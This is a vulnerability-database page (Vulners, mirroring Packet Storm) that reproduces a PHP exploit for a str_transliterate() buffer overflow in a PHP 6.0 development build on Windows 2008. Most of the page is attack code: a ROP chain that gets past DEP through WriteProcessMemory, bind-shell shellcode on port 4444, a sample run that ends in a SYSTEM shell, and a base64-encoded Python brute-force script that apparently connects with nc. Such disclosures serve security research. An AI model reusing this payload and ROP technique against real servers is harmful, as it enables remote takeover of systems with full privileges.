Vulners
Lucene search
PHP 6.0 Dev str_transliterate() Buffer Overflow
🗓️ 14 Apr 2010 00:00:00Reported by Matteo MemelliType 
packetstorm🔗 packetstormsecurity.com👁 23 Views
`<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
Thx to muts and Elwood for helping ;)
Bruteforce script is attached in base64 format.
root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
error_reporting(0);
$base_s = $_GET['pos_s'];
$base_e = $_GET['pos_e'];
$off_s = $_GET['off_s'];
$off_e = $_GET['off_e'];
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 32);
$tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM
$ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
$ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM
$wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS
$garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
"\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";";
eval($garbage);
$nops = str_repeat("\u9090", 41);
// TH || ROP -> Try Harder or Rest On Pain ;)
// GETTING SHELLCODE ABSOLUTE ADDRESS
$rop = "\u40dd\u6FF2"; // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN 6FF240DD
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4
$rop .= "\uFDBC\uFFFF"; // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
$rop .= "\u222B\u6EED"; // ADD EAX,ECX/POP EBX/POP EBP/RETN 6EED222B
$rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)
$rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE)
// PATCHING BUFFER ADDY ARG FOR WPM
$rop .= "\u1C13\u6EE6"; // ADD DWORD PTR DS:[EAX],EAX/RETN 6EE61C13
// GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
$rop .= "\uE94E\u6EE6"; // MOV EDX,ECX/POP EBP/RETN 6EE6E94E
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4
$rop .= "\uFF5C\uFFFF"; // VALUE TO BE POPPED IN ECX FFFFFF5C
$rop .= "\uE94C\u6EE6"; // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN 6EE6E94C
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
// PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
$rop .= "\u0C54\u6EE7"; // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN 6EE70C54
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
// REALIGNING ESP TO WPM AND RETURNING TO IT
$rop .= "\u8640\u6EE6"; // ADD EAX,-30/POP EBP/RETN 6EE68640
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1
$rop .= "\u4242\u4242"; // JUNK POPPED IN EBP
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD
$rop .= "\u2C63\u6FC5"; // XCHG EAX,ESP/RETN 6FC52C63
// unicode bind shellcode port 4444, 318 bytes
$sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b".
"\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824".
"\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db".
"\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233".
"\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02".
"\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189".
"\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0".
"\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a".
"\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c".
"\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155".
"\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0".
"\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344";
$exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
str_transliterate(0, $exploit, 0);
} else {
exit("Error! 'unicode.semantics' has be on!\r\n");
}
function ini_get_bool($a) {
$b = ini_get($a);
switch (strtolower($b)) {
case 'on':
case 'yes':
case 'true':
return 'assert.active' !== $a;
case 'stdout':
case 'stderr':
return 'display_errors' === $a;
default:
return (bool) (int) $b;
}
}
/*
IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt
cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91
dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg
ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g
c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw
YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw
LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6
IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp
biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp
CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh
cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp
Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms
IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k
Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu
dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy
aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9
PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg
fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ
cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y
ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy
ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg
ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg
Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt
ZS5zbGVlcCgwLjA1KSAK
*/
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Apr 2010 00:00Current
0.8Low risk
Vulners AI Score0.8